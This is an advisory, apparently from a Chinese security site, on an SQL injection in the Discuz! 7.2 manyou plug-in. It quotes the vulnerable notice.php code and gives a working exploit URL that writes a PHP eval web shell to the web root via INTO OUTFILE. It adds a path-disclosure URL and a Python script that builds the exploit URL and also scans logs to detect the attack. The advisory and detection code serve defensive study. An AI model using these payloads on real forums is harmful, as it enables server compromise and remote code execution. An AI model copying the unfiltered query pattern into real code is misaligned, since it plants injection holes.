Discuz! 7.2 manyou plug-in path disclosure and Get Webshell - vulnerability warning - the black bar safety net

2011-06-09T00:00:00
ID MYHACK58:62201130781
Type myhack58
Reporter Anonymous (佚名)
Modified 2011-06-09T00:00:00

Description


The latest Discuz! 7.2 ships with a new application plug-in, manyou. It is precisely this new plug-in that does not check its incoming parameters, so when GPC (magic_quotes_gpc) is off, the result is an SQL injection vulnerability.

Vulnerability analysis:

File: ./manyou/sources/notice.php

The relevant code:


The following is the quoted fragment:

if($option == 'del') {
    $appid = intval($_GET['appid']);
    $db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");
    showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} elseif($option == 'deluserapp') {
    $hash = trim($_GET['hash']); // not filtered here (only trimmed); this is what produces the injection
    if($action == 'invite') {
        // $hash goes straight into a SELECT, so INTO OUTFILE is reachable through this branch
        $query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
        if($value = $db->fetch_array($query)) {
            $db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
            showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
        } else {
            showmessage('manyou:noperm');
        }
    } else {
        // same unfiltered value, this time inside a DELETE
        $db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");
        showmessage('manyou:done', 'userapp.php?script=notice');
    }
}


A very simple vulnerability. Because the query result is never echoed back to the page, one would normally have to fall back on blind injection; but if the current database account has FILE_PRIV, the SELECT in the action=invite branch can be turned into a SELECT ... INTO OUTFILE and the file written directly. The hex literal in the URL below decodes to <?php @eval($_POST['O']);?>, the number of columns in the UNION must match the myinvite table, and the absolute web root must be known (which is what the path disclosure at the end provides); MySQL must also run on the same host as the web server with write access to that directory.

/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504f53545b274f275d293b3f3e,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23
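As an added example (it is not part of the original advisory and not Discuz! code), the script below does three things a practitioner would want around the URL above: it decodes the MySQL 0x literal to confirm what file content the request writes, it rebuilds the same `hash` payload and exploit URL from a column count and an outfile path, and it scans access-log lines for requests that reach the unfiltered `option=deluserapp` code path in notice.php with a quote or UNION/OUTFILE keywords in `hash`. It assumes nine columns in the myinvite table (as the advisory's URL implies) and the target host name is hypothetical; the log lines at the bottom are constructed sample input.

```python
# Added example: build and recognise the INTO OUTFILE payload used against
# ./manyou/sources/notice.php (option=deluserapp, unfiltered $_GET['hash']).
# Runs offline; SAMPLE_LOG below is constructed, not captured from a real server.
import re
from urllib.parse import parse_qs, quote, urlparse

WEBSHELL = "<?php @eval($_POST['O']);?>"  # what the advisory's hex literal decodes to


def to_mysql_hex(s: str) -> str:
    """Encode text as a MySQL 0x... literal so the payload needs no extra quotes."""
    return "0x" + s.encode("latin-1").hex().upper()


def from_mysql_hex(literal: str) -> str:
    """Decode a MySQL 0x... literal back to text (to see what a captured payload writes)."""
    if not literal.lower().startswith("0x") or len(literal) % 2:
        raise ValueError("not a 0x literal")
    return bytes.fromhex(literal[2:]).decode("latin-1")


def build_outfile_payload(columns: int, payload_col: int, outfile: str, content: str = WEBSHELL) -> str:
    """Value of the `hash` parameter: close the quoted string, UNION in one row whose
    payload_col (1-based) holds the file content, write it with INTO OUTFILE and comment
    out the remainder of the original WHERE clause with '#'. `columns` must equal the
    column count of the myinvite table or MySQL rejects the UNION (assumed 9 here)."""
    cols = ["NULL"] * columns
    cols[payload_col - 1] = to_mysql_hex(content)
    return "' union select " + ",".join(cols) + " into outfile '" + outfile + "'#"


def build_exploit_url(base: str, columns: int, payload_col: int, outfile: str) -> str:
    """Full request: action=invite is required so $hash lands in the SELECT, not the DELETE."""
    payload = build_outfile_payload(columns, payload_col, outfile)
    return (base + "/userapp.php?script=notice&view=all&option=deluserapp"
            "&action=invite&hash=" + quote(payload, safe=""))


# --- detection side -----------------------------------------------------------
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
SUSPICIOUS = re.compile(r"union\s+select|into\s+(?:out|dump)file", re.IGNORECASE)
HEX_LITERAL = re.compile(r"0x[0-9A-Fa-f]+")


def request_target(log_line: str):
    """Extract the request target from a combined-format access log line."""
    m = REQUEST_RE.search(log_line)
    return m.group(1) if m else None


def injected_hash(target: str):
    """Return the decoded `hash` value when the request hits the vulnerable code path
    (userapp.php, script=notice, option=deluserapp) and carries injection markers."""
    u = urlparse(target)
    if not u.path.endswith("/userapp.php"):
        return None
    q = parse_qs(u.query, keep_blank_values=True)  # parse_qs URL-decodes, so %27 is caught
    if q.get("script") != ["notice"] or q.get("option") != ["deluserapp"]:
        return None
    for h in q.get("hash", []):
        if "'" in h or SUSPICIOUS.search(h):
            return h
    return None


def written_content(hash_value: str):
    """Decode the first 0x literal in a flagged payload to show the file it would write."""
    m = HEX_LITERAL.search(hash_value)
    return from_mysql_hex(m.group(0)) if m else None


def scan_log(lines):
    """Return (line index, decoded hash value) for every flagged request."""
    hits = []
    for i, line in enumerate(lines):
        t = request_target(line)
        h = injected_hash(t) if t else None
        if h is not None:
            hits.append((i, h))
    return hits


# Constructed sample log: a benign delete, the advisory's OUTFILE request, an unrelated option.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Jun/2011:10:00:00 +0800] "GET /userapp.php?script=notice&option=deluserapp&action=invite&hash=7f3a9c HTTP/1.1" 200 512',
    '10.0.0.9 - - [09/Jun/2011:10:00:03 +0800] "GET /userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=%27%20union%20select%20NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504f53545b274f275d293b3f3e,NULL,NULL,NULL,NULL%20into%20outfile%20%27C:/inetpub/wwwroot/shell.php%27%23 HTTP/1.1" 200 512',
    '10.0.0.9 - - [09/Jun/2011:10:00:05 +0800] "GET /userapp.php?script=notice&option=del&appid=3 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(build_exploit_url("http://target.example", 9, 5, "C:/inetpub/wwwroot/shell.php"))
    for idx, h in scan_log(SAMPLE_LOG):
        print("line", idx, "writes:", written_content(h))
```

The detector keys on the exact parameter combination that reaches the unfiltered query rather than on generic SQL keywords, so a legitimate 32-character hash never trips it, while `%27`-encoded quotes are still caught because `parse_qs` decodes before the check.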

Path disclosure (to learn the web root for INTO OUTFILE): /manyou/admincp.php?my_suffix=%0A%0DTOBY57